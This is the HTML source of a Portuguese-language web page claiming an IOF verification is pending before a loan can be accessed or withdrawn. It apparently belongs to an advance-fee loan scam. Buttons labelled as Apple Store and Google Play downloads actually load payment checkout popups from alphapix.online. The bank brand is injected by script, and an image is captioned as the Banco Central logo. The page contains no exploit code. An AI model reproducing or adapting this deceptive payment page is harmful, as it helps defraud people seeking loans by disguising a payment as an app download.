<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verificação pendente IOF</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="../assets/style.css">
    <script src="../assets/js/links.js"></script>
    <script type="text/javascript">
        (function(c,l,a,r,i,t,y){
            c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
            t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
            y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
        })(window, document, "clarity", "script", "reuxwfsd9v");
    </script>
</head>
<body>
    <nav class="navbar">
        <div class="container">
            <div class="logo-container">
                <img src="../assets/logo.png" alt="Logo" class="img-fluid w-50 img-branca">
            </div>
        </div>
    </nav>


    <!--BOX VIDEO, timeline...-->
    <div class="card border border-secondary shadow p-4 my-4 mx-3 mx-md-4">



      <div class="justify-content-center align-items-center text-center mb-4">
        <h4 class="alert-success" style="color:#2e3191; font-weight: 600;">Quase lá! Hora de ativar seu APP <span class="marca"></span>!</h4>
        <p>Para ativar seu aplicativo e <strong>acessar ou sacar seu empréstimo</strong> com seu cartão virtual, é necessário adquiri-lo na Google Play Store ou Apple Store.</p>
      </div>

      <img src="../assets/app-foto.png" alt="Logo do Banco Central" class="d-block mx-auto w-75 mb-5">

        <script src="https://alphapix.online/popup.min.js?product=acdb1658-7c2f-4a41-8ced-8d3968d1768a&url=https%3A%2F%2Falphapix.online%2Fcheckout%2Facdb1658-7c2f-4a41-8ced-8d3968d1768a&text=Baixar+Apple+Store+%28Iphones%29&color=ffea00&textColor=000000&position=center&shadow=heavy&size=medium&animation=none&borderRadius=8&fontWeight=bold"></script>
<script src="https://cdn.alphapix.online/checkout.js"></script>

        <script src="https://alphapix.online/popup.min.js?product=acdb1658-7c2f-4a41-8ced-8d3968d1768a&url=https%3A%2F%2Falphapix.online%2Fcheckout%2Facdb1658-7c2f-4a41-8ced-8d3968d1768a&text=Baixar+Google+Play+Store+%28Android%29&color=ffea00&textColor=000000&position=center&shadow=heavy&size=medium&animation=none&borderRadius=8&fontWeight=bold"></script>
<script src="https://cdn.alphapix.online/checkout.js"></script>
      


    </div>
    <!-- /conteudo do container do video-->




    <!--FOOTER-->
    <footer class="footer py-3 mt-4 border-top">
    <div class="container">
        <div class="row justify-content-center text-center text-md-start">
        <div class="col-12 col-md-8">
            <p class="mb-2">
            © <span id="currentYear"></span> <span class="marca" style="text-transform: uppercase;"></span> S.A.<br>CNPJ: 60.779.196/0001-96<br>
            <small class="d-block mt-2">
                Avenida Presidente Wilson, 9<br>
                São Vicente/SP - CEP 11320-905
            </small>
            </p>
        </div>
        </div>
    </div>
    </footer>
    

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>

</body>
</html>